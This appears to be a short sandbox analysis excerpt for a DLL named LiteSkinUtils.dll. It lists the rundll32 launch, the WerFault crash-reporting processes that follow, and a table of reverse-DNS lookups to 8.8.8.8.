C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4552 -ip 4552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 588
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |